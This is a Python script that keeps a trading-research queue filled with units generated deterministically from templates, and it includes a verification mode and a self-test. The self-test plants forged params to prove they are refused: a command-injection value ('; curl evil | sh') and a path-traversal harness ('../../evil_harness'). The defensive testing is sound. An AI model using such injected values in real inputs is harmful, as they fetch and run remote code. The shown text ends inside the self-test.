#!/usr/bin/env python3
# wiring: .github/workflows/research-queue-replenish.yml (cron + dispatch); scripts/ci/check_pr_landing.py --verify
"""Keep the research queue full WITHOUT a session: expand pre-registered
template families into concrete queue units, deduped, deterministic.

WHY THIS EXISTS (operator, 2026-09-28, relayed by the manager)
---------------------------------------------------------------
*"The research queue should be running 24/7 with or without Claude, we need
to make sure the queue has enough tests to run and keep replenishing it."*
Until this file the queue was refilled only when a session wrote a unit by
hand -- so every token-capped day was a day the runners sat idle once the
hand-written units had run.

WHAT IT DOES
------------
  1. Reads `research/templates/*.yaml` -- one FAMILY each. A family fixes the
     question, decision rule, power block, cost stack, runner and inputs BEFORE
     any unit exists; the only thing a unit adds is the parameter point
     (leg / symbol x timeframe / geometry / sizing arm).
  2. Expands each family's `grid:` against the repo's committed facts
     (config/strategies.yaml legs, config/accounts.yaml rosters,
     comms/strategy_evidence/<leg>.json records) into candidate units, each
     with a deterministic `generated.key`.
  3. Dedupes: a key that already exists in ANY unit under research/queue/
     (queued, done, blocked, retired) is never generated twice. Recurring
     cadences live on the unit itself (the dispatcher re-fires weekly/monthly
     units), so one unit per key is enough to keep re-asking.
  4. Fills the deficit to `--target` runnable units by the families'
     `weight:` (largest-remainder allocation over the deficit, so 30/25/20/15/10
     is honoured across runs, not just once), taking candidates in sorted key
     order. Ids continue `RQ-<date>-NNN` from the highest NNN already used
     that day.

DETERMINISM IS THE SAFETY PROPERTY. A generated unit self-lands only because
`scripts/ci/check_pr_landing.py` can re-run `--verify` at the PR's merge-base
and get the SAME BYTES from the committed templates and the params the unit
records under `generated.params`. Anything a session or a bot hand-edits into a
generated unit no longer reproduces and therefore holds for a human -- which
is exactly the E57 property (a pre-registered rule may not be rewritten in
the same act that lands it) extended to units nobody wrote by hand.

Every unit carries `decision_rule.registered_before_run: true` because the
template that produced it was committed before the run by construction, and
the rule id embeds the family + parameter point so a result can only be
matched to the rule registered for that point.

Tier-1 research tooling: reads config + committed evidence, writes only
research/queue/RQ-*.yaml. Never touches config/, src/ or a live path.
"""
from __future__ import annotations

import argparse
import copy
import hashlib
import json
import re
import subprocess
import sys
from datetime import date, datetime, timezone
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple

_REPO = Path(__file__).resolve().parents[2]
sys.path.insert(0, str(_REPO))

TEMPLATES = Path("research/templates")
QUEUE = Path("research/queue")
DEFAULT_TARGET = 25
_PLACEHOLDER = re.compile(r"\{([a-z_]+)\}")
# The three the runner substitutes itself (scripts/research/script_run.py
# `_substitute`); anything else left in a rendered unit is a template bug.
RUNNER_PLACEHOLDERS = frozenset({"out_dir", "unit", "run_id"})


def unresolved_placeholders(text: str) -> List[str]:
    """Placeholders still literal in a rendered unit, minus the runner's own."""
    return sorted(set(_PLACEHOLDER.findall(text)) - RUNNER_PLACEHOLDERS)
_ID_RE = re.compile(r"^RQ-(\d{8})-(\d{3})$")
HEADER = ("# GENERATED by scripts/research/queue_replenish.py from {tpl} (template sha {sha})\n"
          "# on {date} for parameter point {key}. Do not hand-edit: a generated unit self-lands\n"
          "# only while `queue_replenish.py --verify` reproduces it byte-for-byte from the template.\n")


# ── repo facts ───────────────────────────────────────────────────────────────
def _yaml():
    import yaml
    return yaml


def _strategies(root: Path) -> Dict[str, Any]:
    return _yaml().safe_load((root / "config" / "strategies.yaml").read_text(encoding="utf-8"))["strategies"]


def repo_facts(root: Path) -> Dict[str, Any]:
    """The committed inputs the grids expand against. Read once, never inferred.
    Accounts come from the canonical loader (src.config.accounts_loader), never
    a hand-rolled parse."""
    from src.config.accounts_loader import load_accounts_dict
    strategies = _strategies(root)
    accounts = load_accounts_dict(root / "config" / "accounts.yaml")
    rostered = set()
    for acc in accounts.values():
        if isinstance(acc, dict):
            rostered.update(acc.get("strategies") or [])
    legs: Dict[str, Dict[str, Any]] = {}
    for leg in sorted(rostered):
        cfg = strategies.get(leg)
        if not isinstance(cfg, dict) or cfg.get("enabled") is False:
            continue
        if str(cfg.get("execution") or "live") != "live":
            continue
        syms = cfg.get("symbols") or []
        legs[leg] = {"symbol": str(syms[0]) if syms else "", "timeframe": str(cfg.get("timeframe") or "")}
    evidence: Dict[str, Dict[str, Any]] = {}
    for leg in legs:
        rec_path = root / "comms" / "strategy_evidence" / f"{leg}.json"
        if not rec_path.is_file():
            continue
        try:
            rec = json.loads(rec_path.read_text(encoding="utf-8"))
            src = root / str(rec["cost_stack"]["source"])
            rows = src.with_name(src.name.replace("__bt.json", "__trades.jsonl"))
            if not rows.is_file():
                continue
            n = sum(1 for ln in rows.open("r", encoding="utf-8") if ln.strip())
            evidence[leg] = {"trades_file": rows.relative_to(root).as_posix(), "n_trades": n}
        except (OSError, ValueError, KeyError, TypeError):
            continue
    return {"legs": legs, "evidence": evidence}


# ── expansion ───────────────────────────────────────────────────────────────
def root_data_dir() -> Path:
    """`plan_legs` needs a data dir only to resolve candles, which `ignore_missing_data`
    waives; the scope decision it returns here is config-only."""
    return Path("data")


def _leg_source(name: str, tpl: Dict[str, Any], facts: Dict[str, Any]) -> List[Dict[str, Any]]:
    legs, ev = facts["legs"], facts["evidence"]
    out: List[Dict[str, Any]] = []
    if name == "live_roster_legs":
        for leg, info in legs.items():
            out.append({"leg": leg, **info})
    elif name == "live_roster_legs_e35_sweepable":
        # ⚠️ THE E35 SWEEP HAS A SCOPE, AND THE TEMPLATE MUST ASK IT RATHER THAN RESTATE IT.
        # `live_roster_legs` fed `ict_scalp_*` legs to e35-bracket-sweep.yml, whose planner
        # refuses the `scalp`/`fvg` families (out_of_scope_family): the run died in its
        # `plan` job after ~90 s with "shard-plan produced ZERO jobs", the dispatcher had
        # already stamped the unit, and the corpus stopped growing -- MEASURED 2026-10-04:
        # RQ-20261002-001 (ict_scalp_mgc_15m) and RQ-20261003-001 (ict_scalp_sol_15m), runs
        # 37086544045 / 37106772916, both red in `plan`; RQ-20260929-005 and -20261003-006
        # carry the same legs. The sweep's OWN resolver (`plan_legs`) is the one scope, so
        # a leg it would refuse is never generated.
        from scripts.research.e35_bracket_geometry_sweep import plan_legs
        runnable, _skipped = plan_legs(root_data_dir(), None, 0.099, ignore_missing_data=True)
        sweepable = {r["leg"] for r in runnable}
        for leg, info in legs.items():
            if leg in sweepable:
                out.append({"leg": leg, **info})
    elif name == "evidence_legs_with_breakout_market":
        markets = tpl.get("markets") or {}
        for leg, info in legs.items():
            m = markets.get(info["symbol"])
            if leg in ev and m:
                out.append({"leg": leg, **info, **ev[leg], "breakout_market": str(m["market"]),
                            "swap_model": str(m["swap_model"])})
    elif name == "live_roster_legs_with_e7_harness":
        pats = tpl.get("harness_by_leg_pattern") or {}
        for leg, info in legs.items():
            harness = next((h for pat, h in pats.items() if pat in leg), None)
            if harness:
                out.append({"leg": leg, **info, "harness": harness})
    else:
        raise ValueError(f"unknown legs source {name!r}")
    return out


def _int_or_none(v: Any) -> Optional[int]:
    if isinstance(v, bool):
        return None
    try:
        return int(v)
    except (TypeError, ValueError):
        return None


def min_n_trades(tpl: Dict[str, Any]) -> Optional[int]:
    """The template's declared `min_n_trades` floor, or None if it declares none.

    When the template's run command also passes `--n-floor`, the two MUST agree:
    a generator floor that differs from the one the unit grades against would
    re-open exactly the gap this exists to close.
    """
    if "min_n_trades" not in tpl:
        return None
    floor = _int_or_none(tpl.get("min_n_trades"))
    if floor is None or floor < 0:
        raise ValueError(f"template {tpl.get('family')!r}: min_n_trades must be a non-negative int")
    cmd = (tpl.get("run") or {}).get("command") or []
    if isinstance(cmd, list) and "--n-floor" in cmd:
        i = cmd.index("--n-floor")
        graded = _int_or_none(cmd[i + 1]) if i + 1 < len(cmd) else None
        if graded != floor:
            raise ValueError(f"template {tpl.get('family')!r}: min_n_trades {floor} != "
                             f"run.command --n-floor {graded!r}")
    return floor


def expand(tpl: Dict[str, Any], facts: Dict[str, Any]) -> List[Dict[str, Any]]:
    """All parameter points of a family, each a flat dict of placeholders."""
    grid = dict(tpl.get("grid") or {})
    points: List[Dict[str, Any]] = [{}]
    if "legs" in grid:
        points = _leg_source(str(grid.pop("legs")), tpl, facts)
    floor = min_n_trades(tpl)
    if floor is not None:
        # ⚠️ A unit whose committed n is below its OWN registered n-floor can only
        # ever grade UNDERPOWERED (PI-20261004-FOJGFIZF-0002: 33 prop-fit-breakout
        # runs, legs at n=57 vs the 88 floor, zero decisions). Such a leg is not
        # minted; because `point_key` excludes n_trades, it is minted on the first
        # replenish after its committed evidence reaches the floor -- accruing,
        # not dropped. A point with no readable n cannot show it clears the floor.
        points = [p for p in points if _int_or_none(p.get("n_trades")) is not None
                  and _int_or_none(p.get("n_trades")) >= floor]
    for axis in sorted(grid):
        values = grid[axis]
        if not isinstance(values, list) or not values:
            raise ValueError(f"grid.{axis} must be a non-empty list")
        nxt: List[Dict[str, Any]] = []
        for p in points:
            for v in values:
                q = dict(p)
                if isinstance(v, dict):
                    q[f"{axis}_key"] = str(v["key"])
                    q[axis] = str(v.get("label", v["key"]))
                    for k, val in v.items():
                        if k not in ("key", "label"):
                            q[f"{axis}_{k}"] = str(val)
                else:
                    q[axis] = str(v)
                nxt.append(q)
        points = nxt
    return points


def point_key(family: str, p: Dict[str, Any]) -> str:
    """The identity of a parameter point: family + the axes that define it
    (never derived facts such as n_trades, which move as evidence accrues)."""
    ident = {k: v for k, v in sorted(p.items())
             if k == "leg" or k.endswith("_key") or k in ("start_date", "cadence_days")}
    return family + ":" + ",".join(f"{k}={v}" for k, v in ident.items())


def _fill(obj: Any, params: Dict[str, Any]) -> Any:
    if isinstance(obj, str):
        return _PLACEHOLDER.sub(lambda m: str(params[m.group(1)]) if m.group(1) in params else m.group(0), obj)
    if isinstance(obj, list):
        return [_fill(x, params) for x in obj]
    if isinstance(obj, dict):
        return {k: _fill(v, params) for k, v in obj.items()}
    return obj


def render(tpl: Dict[str, Any], tpl_path: str, tpl_sha: str, params: Dict[str, Any],
           unit_id: str, day: str) -> str:
    """The unit file's exact text for (template, params, id, date)."""
    yaml = _yaml()
    p = dict(params)
    p["unit_id"] = unit_id
    p["date"] = day
    unit: Dict[str, Any] = {"id": unit_id, "title": _fill(tpl["title"], p), "status": "queued",
                            "cadence": str(tpl.get("cadence") or "once"), "kind": str(tpl.get("kind") or "experiment")}
    if tpl.get("theme") is not None:
        unit["theme"] = str(tpl["theme"])
    if tpl.get("priority") is not None:
        unit["priority"] = int(tpl["priority"])
    if tpl.get("why_not_inferential"):
        unit["why_not_inferential"] = _fill(tpl["why_not_inferential"], p)
    unit["question"] = _fill(tpl["question"], p)
    unit["why_this_matters"] = _fill(tpl.get("why_this_matters", ""), p)
    power = _fill(tpl["power"], p)
    if isinstance(power.get("expected_n"), str) and power["expected_n"].isdigit():
        power["expected_n"] = int(power["expected_n"])
    unit["power"] = power
    rule = _fill(tpl["decision_rule"], p)
    rule["registered_at"] = day
    rule["registered_before_run"] = True
    unit["decision_rule"] = rule
    unit["routing"] = _fill(tpl["routing"], p)
    run = _fill(tpl["run"], p)
    inputs = dict(run.get("inputs") or {})
    if run.get("workflow") == "research-script-run.yml":
        inputs["research_unit"] = unit_id
    run["inputs"] = inputs
    unit["run"] = run
    unit["lands"] = _fill(tpl["lands"], p)
    unit["generated"] = {"family": str(tpl["family"]), "template": tpl_path, "template_sha": tpl_sha,
                         "key": point_key(str(tpl["family"]), params),
                         "params": {k: str(v) for k, v in sorted(params.items())}}
    unit["last_dispatched_at"] = None
    body = yaml.safe_dump(unit, sort_keys=False, width=100, allow_unicode=True)
    left = unresolved_placeholders(body)
    if left:
        # A template placeholder the grid never supplies would otherwise ship
        # verbatim into the unit's argv and fail every cell at run time (the six
        # prop-fit units of 2026-09-28 ran `{sizing_args}` literally). Refuse
        # here, at generation, where the fix is one template edit.
        raise ValueError(f"{tpl_path}: placeholder(s) {left} are not resolved by the point "
                         f"{sorted(p)} -- not one of the runner's own ({sorted(RUNNER_PLACEHOLDERS)}) "
                         "and not a grid axis / fact; fix the template")
    return HEADER.format(tpl=tpl_path, sha=tpl_sha, date=day, key=unit["generated"]["key"]) + body


# ── the queue as it is ──────────────────────────────────────────────────────
def load_templates(root: Path) -> List[Tuple[str, str, Dict[str, Any]]]:
    yaml = _yaml()
    out = []
    for path in sorted((root / TEMPLATES).glob("*.yaml")):
        text = path.read_text(encoding="utf-8")
        tpl = yaml.safe_load(text)
        for key in ("family", "weight", "title", "question", "power", "decision_rule", "routing", "run", "lands", "grid"):
            if key not in tpl:
                raise ValueError(f"{path.name}: template lacks `{key}`")
        out.append((path.relative_to(root).as_posix(), hashlib.sha256(text.encode("utf-8")).hexdigest()[:12], tpl))
    return out


def existing_units(root: Path) -> Tuple[Dict[str, Dict[str, Any]], List[str]]:
    """{id: unit} over research/queue/**/*.yaml, plus the ids that could not be read."""
    yaml = _yaml()
    units: Dict[str, Dict[str, Any]] = {}
    bad: List[str] = []
    for path in sorted((root / QUEUE).rglob("*.yaml")):
        try:
            raw = yaml.safe_load(path.read_text(encoding="utf-8")) or {}
        except (OSError, UnicodeDecodeError, yaml.YAMLError):
            # The three things reading a unit can fail on; REPORTED in `bad`,
            # never skipped -- an unreadable unit is a finding, not silence.
            bad.append(path.stem)
            continue
        if isinstance(raw, dict):
            units[path.stem] = raw
        else:
            bad.append(path.stem)
    return units, bad


#: The REPLENISH HORIZON, not the dispatcher's cadence. The dispatcher's cron
#: is HOURLY (`20 * * * *`, research-queue-dispatch.yml, operator 2026-10-06:
#: the git infrastructure keeps the queue moving, not a session); it was
#: `20 */6 * * *` until then. This stays 6.0 so "runnable" keeps meaning
#: "would fire within the next six hours" and the daily refill target of 25
#: runnable units is measured over the same window as before the change.
DISPATCH_CYCLE_HOURS = 6.0


def dispatchable(u: Dict[str, Any]) -> bool:
    """Routed to a real *.yml workflow (not a session note) and still queued."""
    wf = str((u.get("run") or {}).get("workflow") or "")
    return u.get("status") == "queued" and wf.endswith((".yml", ".yaml")) and not any(c.isspace() for c in wf)


def runnable(units: Dict[str, Dict[str, Any]], *, now: Optional[datetime] = None,
             horizon_hours: float = DISPATCH_CYCLE_HOURS) -> List[str]:
    """Queued units the dispatcher WOULD FIRE within the next cycle: a real
    *.yml workflow AND due by the dispatcher's own rule (`dispatch_queue.due_within`)
    at now + horizon. `status: queued` alone is NOT runnable: a `once` unit that
    already ran is waiting on grading, and a monthly unit that ran yesterday is
    idle for 29 days. Measured 2026-09-29 04:35Z on main (manager): 21 units
    read "runnable" while the dispatcher would fire 3 -- so the refill saw no
    deficit and the alarm stayed quiet while the runners sat idle."""
    from scripts.research.dispatch_queue import due_within
    now = now or datetime.now(timezone.utc)
    return sorted(uid for uid, u in units.items() if dispatchable(u) and due_within(u, now, horizon_hours))


def allocate(deficit: int, weights: Dict[str, int], available: Dict[str, int]) -> Dict[str, int]:
    """Largest-remainder split of `deficit` by weight, capped by availability,
    with the leftover re-split among families that still have candidates."""
    alloc = {f: 0 for f in weights}
    remaining = max(0, deficit)
    while remaining > 0:
        open_f = {f: w for f, w in weights.items() if available[f] - alloc[f] > 0}
        if not open_f:
            break
        total = sum(open_f.values())
        shares = {f: remaining * w / total for f, w in open_f.items()}
        floors = {f: int(shares[f]) for f in open_f}
        left = remaining - sum(floors.values())
        for f in sorted(open_f, key=lambda f: (-(shares[f] - floors[f]), f)):
            if left <= 0:
                break
            floors[f] += 1
            left -= 1
        progressed = False
        for f, n in floors.items():
            take = min(n, available[f] - alloc[f])
            if take > 0:
                alloc[f] += take
                remaining -= take
                progressed = True
        if not progressed:
            break
    return alloc


#: Numbers 900-999 of every day are RESERVED for hand-authored units (next_rq_id.py mints
#: there); this generator mints only 001-899. PI-20261005-RQ-ID-RACE-0001: both used to mint
#: max+1 from the same counter, and the generator -- which cannot see an open PR -- caught up to
#: ids a lane had already put on a branch (the 2026-10-05 653..661 collision). Disjoint bands
#: make that collision impossible rather than unlikely. scripts/ci/check_research_queue_id_bands.py
#: enforces the split on every unit a PR adds. DECIDED by lane RQ-INFRA 2026-10-07; reverse by
#: moving this constant and next_rq_id.HAND_FLOOR together.
HAND_FLOOR = 900


def next_ids(units: Dict[str, Dict[str, Any]], day: str, count: int) -> List[str]:
    """Up to ``count`` ids in the GENERATED band. Returns FEWER when the band is full (the caller
    zips against it, so the day simply stops minting) -- a full day must not crash the replenisher,
    because a replenisher that cannot run is a queue that waits on a session."""
    compact = day.replace("-", "")
    used = [int(m.group(2)) for uid in units
            if (m := _ID_RE.match(uid)) and m.group(1) == compact and int(m.group(2)) < HAND_FLOOR]
    start = (max(used) if used else 0) + 1
    return [f"RQ-{compact}-{n:03d}" for n in range(start, min(start + count, HAND_FLOOR))]


def plan(root: Path, *, day: str, target: int, now: Optional[datetime] = None) -> Dict[str, Any]:
    facts = repo_facts(root)
    units, bad = existing_units(root)
    have = runnable(units, now=now)
    seen_keys = {str((u.get("generated") or {}).get("key")) for u in units.values() if isinstance(u.get("generated"), dict)}
    families = []
    for tpl_path, sha, tpl in load_templates(root):
        cands = [(point_key(str(tpl["family"]), p), p) for p in expand(tpl, facts)]
        cands = sorted((k, p) for k, p in cands if k not in seen_keys)
        families.append({"family": str(tpl["family"]), "weight": int(tpl["weight"]), "path": tpl_path, "sha": sha,
                         "tpl": tpl, "candidates": cands})
    deficit = target - len(have)
    alloc = allocate(deficit, {f["family"]: f["weight"] for f in families},
                     {f["family"]: len(f["candidates"]) for f in families})
    chosen: List[Tuple[Dict[str, Any], str, Dict[str, Any]]] = []
    for f in families:
        for key, p in f["candidates"][:alloc[f["family"]]]:
            chosen.append((f, key, p))
    ids = next_ids(units, day, len(chosen))
    new_units = []
    for (f, key, p), uid in zip(chosen, ids):
        new_units.append({"id": uid, "family": f["family"], "key": key,
                          "text": render(f["tpl"], f["path"], f["sha"], p, uid, day)})
    return {"day": day, "target": target, "runnable_before": len(have), "deficit": deficit, "unreadable": bad,
            "queued_not_due": sorted(uid for uid, u in units.items() if dispatchable(u) and uid not in have),
            "candidates": {f["family"]: len(f["candidates"]) for f in families}, "allocation": alloc,
            "new_units": new_units}


# ── verify: reproduce every generated unit a branch adds ────────────────────
def _git(root: Path, *args: str) -> Tuple[int, str]:
    p = subprocess.run(["git", *args], cwd=str(root), capture_output=True, text=True)
    return p.returncode, p.stdout.strip()


def verify(root: Path, base: str) -> List[str]:
    """Problems with the units this branch ADDS under research/queue/ relative to
    `base`: each must be byte-identical to a re-render from the template at
    HEAD with the params the unit records. Modified or deleted queue files are
    problems too -- the generator only ever ADDS."""
    yaml = _yaml()
    rc, mb = _git(root, "merge-base", base, "HEAD")
    if rc != 0 or not mb:
        return [f"merge-base with {base} unreadable"]
    rc, out = _git(root, "diff", "--name-status", "--no-renames", mb, "HEAD", "--", QUEUE.as_posix())
    if rc != 0:
        return ["queue diff unreadable"]
    problems: List[str] = []
    templates = {p: (sha, tpl) for p, sha, tpl in load_templates(root)}
    # ⚠️ REVIEW FIX (2026-09-29): `generated.params` comes from the unit under
    # test, so a hand-made unit could carry ANY params (a leg that does not
    # exist, a `../../evil` harness, shell metacharacters in an arm) and still
    # reproduce byte-for-byte from the template -- E58 would then vouch a unit
    # nobody pre-registered. The params are only trusted when they are one of
    # the points the template EXPANDS TO from HEAD's own rosters + evidence.
    facts = repo_facts(root)
    points_by_tpl: Dict[str, Optional[set]] = {}
    for tpl_path, (sha, tpl) in templates.items():
        try:
            pts = expand(tpl, facts)
        except (ValueError, KeyError, TypeError) as exc:
            problems.append(f"{tpl_path}: cannot expand at HEAD ({exc}) -- nothing generated from it is vouched")
            points_by_tpl[tpl_path] = None
            continue
        points_by_tpl[tpl_path] = {tuple(sorted((k, str(v)) for k, v in pt.items())) for pt in pts}
    for line in out.splitlines():
        status, _, path = line.partition("\t")
        if status != "A":
            problems.append(f"{path}: {status} -- the generator only ADDS units; an edited or deleted unit is a session's act")
            continue
        text = (root / path).read_text(encoding="utf-8")
        try:
            unit = yaml.safe_load(text)
        except yaml.YAMLError as exc:
            problems.append(f"{path}: unreadable ({exc})")
            continue
        gen = (unit or {}).get("generated") or {}
        tpl_path = str(gen.get("template") or "")
        if tpl_path not in templates:
            problems.append(f"{path}: names template {tpl_path!r}, which is not committed at HEAD")
            continue
        sha, tpl = templates[tpl_path]
        if str(gen.get("template_sha")) != sha:
            problems.append(f"{path}: generated from template sha {gen.get('template_sha')}, HEAD's is {sha}")
            continue
        m = _ID_RE.match(str(unit.get("id")))
        if not m or Path(path).stem != unit.get("id"):
            problems.append(f"{path}: id/filename mismatch")
            continue
        day = f"{m.group(1)[:4]}-{m.group(1)[4:6]}-{m.group(1)[6:]}"
        params = dict(gen.get("params") or {})
        if point_key(str(tpl["family"]), params) != str(gen.get("key")):
            problems.append(f"{path}: generated.key does not match generated.params")
            continue
        allowed = points_by_tpl.get(tpl_path)
        if allowed is None or tuple(sorted((k, str(v)) for k, v in params.items())) not in allowed:
            problems.append(f"{path}: generated.params is not a point {tpl_path} expands to from HEAD's "
                            "rosters and evidence -- not pre-registered, refused")
            continue
        expected = render(tpl, tpl_path, sha, params, str(unit["id"]), day)
        if expected != text:
            problems.append(f"{path}: does not reproduce from {tpl_path} + generated.params (hand-edited?)")
    return problems


# ── self-test ───────────────────────────────────────────────────────────────
def _fixture_config(r: Path) -> None:
    """One live leg on one roster, written as the two canonical config files."""
    yaml = _yaml()
    (r / "config" / "strategies.yaml").write_text(yaml.safe_dump({"strategies": {
        "xrp_pullback_2h": {"symbols": ["XRPUSDT"], "timeframe": "2h", "execution": "live", "enabled": True}}}))
    (r / "config" / "accounts.yaml").write_text(yaml.safe_dump({"accounts": {"bybit_2": {"strategies": ["xrp_pullback_2h"]}}}))


def _self_test() -> int:
    import tempfile
    assert allocate(20, {"a": 30, "b": 25, "c": 20, "d": 15, "e": 10}, {k: 99 for k in "abcde"}) == \
        {"a": 6, "b": 5, "c": 4, "d": 3, "e": 2}
    assert allocate(10, {"a": 30, "b": 70}, {"a": 1, "b": 99}) == {"a": 1, "b": 9}   # exhausted family re-split
    assert allocate(0, {"a": 1}, {"a": 5}) == {"a": 0}
    assert allocate(5, {"a": 1}, {"a": 0}) == {"a": 0}
    assert _fill("x {leg} {out_dir} {nope}", {"leg": "L"}) == "x L {out_dir} {nope}"
    # runnable == what the dispatcher would fire within the next cycle, never bare `status: queued`
    t0 = datetime(2030, 1, 10, 12, tzinfo=timezone.utc)
    ago = lambda **kw: (t0 - __import__("datetime").timedelta(**kw)).isoformat()  # noqa: E731
    wf = {"workflow": "x.yml"}
    planted = {
        "once-never":    {"status": "queued", "cadence": "once", "run": wf, "last_dispatched_at": None},
        "once-ran":      {"status": "queued", "cadence": "once", "run": wf, "last_dispatched_at": ago(hours=3)},
        "monthly-fresh": {"status": "queued", "cadence": "monthly", "run": wf, "last_dispatched_at": ago(days=2)},
        "monthly-old":   {"status": "queued", "cadence": "monthly", "run": wf, "last_dispatched_at": ago(days=31)},
        "weekly-soon":   {"status": "queued", "cadence": "weekly", "run": wf, "last_dispatched_at": ago(days=6, hours=20)},
        "done-never":    {"status": "done", "cadence": "once", "run": wf, "last_dispatched_at": None},
        "session-bound": {"status": "queued", "cadence": "once", "run": {"workflow": "none -- session-local"}},
    }
    assert runnable(planted, now=t0) == ["monthly-old", "once-never", "weekly-soon"], runnable(planted, now=t0)
    assert runnable(planted, now=t0, horizon_hours=0) == ["monthly-old", "once-never"]   # weekly-soon is due in 4 h
    assert len([u for u in planted.values() if dispatchable(u)]) == 5, "5 read queued; only 3 are runnable"
    root = _REPO
    # Plan ABOVE the live runnable count, so this checks the templates and not
    # whether the queue happens to be full today: the first replenish PR
    # (#13950, 2026-09-29) filled the queue to exactly 25 and this self-test,
    # planning at target 25, then failed the guard on that very PR.
    live_have = len(runnable(existing_units(root)[0]))
    p1 = plan(root, day="2030-01-01", target=live_have + 3)
    p2 = plan(root, day="2030-01-01", target=live_have + 3)
    assert [u["text"] for u in p1["new_units"]] == [u["text"] for u in p2["new_units"]], "not deterministic"
    assert p1["new_units"], "the live templates generate nothing -- a template or a grid source is broken"
    assert plan(root, day="2030-01-01", target=live_have)["new_units"] == [], "a full queue must generate nothing"
    # every generated unit is valid queue schema + a pre-registered rule
    from scripts.research.research_queue import validate, grade_power, grade_route
    yaml = _yaml()
    for u in p1["new_units"]:
        d = yaml.safe_load(u["text"])
        errs = validate(d)
        assert not errs, (u["id"], errs)
        assert d["decision_rule"]["registered_before_run"] is True
        assert grade_power(d).runnable, (u["id"], grade_power(d).reason)
        assert grade_route(d).runnable, (u["id"], grade_route(d).reason)
        if d["run"]["workflow"] == "research-script-run.yml":
            from scripts.research import script_run
            with tempfile.TemporaryDirectory() as td:
                q = Path(td)
                (q / f"{u['id']}.yaml").write_text(u["text"])
                pl = script_run.plan(u["id"], run_id="st", queue_dir=q, repo=root)
                assert pl.ok, (u["id"], pl.errors)
    # PI-20261004-FOJGFIZF-0002: a leg below the template's own n-floor is never minted
    # (planted: 57 < 88 skipped, 88 and 169 kept, unreadable n skipped), and a floor that
    # disagrees with the run's --n-floor is refused rather than silently diverging.
    ftpl = {"family": "f", "grid": {"legs": "evidence_legs_with_breakout_market"},
            "markets": {"X": {"market": "XM", "swap_model": "s"}}, "min_n_trades": 88,
            "run": {"command": ["p", "--n-floor", "88"]}}
    ffacts = {"legs": {a: {"symbol": "X", "timeframe": "1h"} for a in ("lo", "eq", "hi", "bad")},
              "evidence": {"lo": {"trades_file": "t", "n_trades": 57}, "eq": {"trades_file": "t", "n_trades": 88},
                           "hi": {"trades_file": "t", "n_trades": 169}, "bad": {"trades_file": "t", "n_trades": "x"}}}
    assert sorted(p["leg"] for p in expand(ftpl, ffacts)) == ["eq", "hi"], expand(ftpl, ffacts)
    assert len(expand({k: v for k, v in ftpl.items() if k != "min_n_trades"}, ffacts)) == 4
    try:
        expand({**ftpl, "run": {"command": ["p", "--n-floor", "39"]}}, ffacts)
    except ValueError as e:
        assert "--n-floor" in str(e), e
    else:
        raise AssertionError("min_n_trades disagreeing with --n-floor was not refused")
    for tpl_path_f, _sha_f, tpl_f in load_templates(root):
        fl = min_n_trades(tpl_f)
        if fl is not None:
            for pt in expand(tpl_f, repo_facts(root)):
                assert int(pt["n_trades"]) >= fl, (tpl_path_f, pt["leg"], pt["n_trades"], fl)
    # no live template leaves a placeholder unresolved (prop-fit-breakout did on 2026-09-28)
    for u in p1["new_units"]:
        assert unresolved_placeholders(u["text"]) == [], (u["id"], unresolved_placeholders(u["text"]))
    # ... and a template that would is refused at render time, before any file is written
    tpl_path0, sha0, tpl0 = load_templates(root)[0]
    facts0 = repo_facts(root)
    pt0 = expand(tpl0, facts0)[0]
    broken = copy.deepcopy(tpl0)
    broken["title"] = str(broken["title"]) + " {no_such_axis}"   # any field: the check reads the whole body
    try:
        render(broken, tpl_path0, sha0, pt0, "RQ-20300101-999", "2030-01-01")
    except ValueError as e:
        assert "no_such_axis" in str(e), e
    else:
        raise AssertionError("a template with an unresolved placeholder rendered instead of being refused")
    render(tpl0, tpl_path0, sha0, pt0, "RQ-20300101-999", "2030-01-01")   # the real one still renders
    # verify(): a reproduced unit passes, a hand-edited one fails, an edit to an existing unit fails
    with tempfile.TemporaryDirectory() as td:
        r = Path(td)
        subprocess.run(["git", "init", "-q", "-b", "main", str(r)], check=True)
        for sub in ("research/templates", "research/queue", "config", "comms/strategy_evidence"):
            (r / sub).mkdir(parents=True)
        for f in (root / TEMPLATES).glob("*"):
            (r / TEMPLATES / f.name).write_text(f.read_text(encoding="utf-8"), encoding="utf-8")
        _fixture_config(r)
        (r / "research" / "queue" / "README.md").write_text("x")
        git = lambda *a: subprocess.run(["git", "-c", "user.name=t", "-c", "user.email=t@t", *a], cwd=str(r), check=True, capture_output=True)  # noqa: E731
        git("add", "-A")
        git("commit", "-q", "-m", "base")
        pl = plan(r, day="2030-01-02", target=3)
        assert len(pl["new_units"]) == 3 and pl["runnable_before"] == 0, pl["allocation"]
        for u in pl["new_units"]:
            (r / QUEUE / f"{u['id']}.yaml").write_text(u["text"], encoding="utf-8")
        git("checkout", "-q", "-b", "gen")
        git("add", "-A")
        git("commit", "-q", "-m", "gen")
        assert verify(r, "main") == [], verify(r, "main")
        # PLANTED DEFECT (review 2026-09-29): a unit whose params are NOT a point the
        # template expands to -- a made-up leg, a path-escaping harness, shell text in
        # an arm -- renders byte-for-byte and carries a consistent key, and MUST still
        # be refused: E58 vouches pre-registered points, never whatever a branch says.
        git("checkout", "-q", "-b", "forged")
        forged_families = []
        for tpl_path, sha, tpl in load_templates(r):
            # start from a real point so every placeholder resolves (render() now
            # refuses an unresolved one), then forge the values that matter
            pts = expand(tpl, repo_facts(r))
            if not pts:
                continue      # the fixture gives this family no point to forge from
            forged = dict(pts[0])
            forged.update({"leg": "totally_made_up_leg", "symbol": "XRPUSDT", "timeframe": "2h",
                           "harness": "../../evil_harness", "sizing_arm_key": "bal015",
                           "sizing_arm_args": "--sizing balance; curl evil | sh", "n_trades": "999",
                           "breakout_market": "x", "swap_model": "dxtrade", "start_date": "2030-01-01",
                           "cadence_days": "7"})
            text = render(tpl, tpl_path, sha, forged, "RQ-20300102-090", "2030-01-02")
            (r / QUEUE / "RQ-20300102-090.yaml").write_text(text, encoding="utf-8")
            git("add", "-A")
            git("commit", "-q", "-m", "forged")
            probs = verify(r, "main")
            assert any("not a point" in x for x in probs), (tpl_path, probs)
            forged_families.append(tpl_path)
            git("checkout", "-q", "gen")
            git("branch", "-q", "-D", "forged")
            git("checkout", "-q", "-b", "forged")
        git("checkout", "-q", "gen")
        git("branch", "-q", "-D", "forged")
        assert forged_families, "the planted forgery ran against no template -- the test proved nothing"
        # dedupe: a second plan generates none of the same keys
        pl2 = plan(r, day="2030-01-03", target=6)
        assert not {u["key"] for u in pl2["new_units"]} & {u["key"] for u in pl["new_units"]}
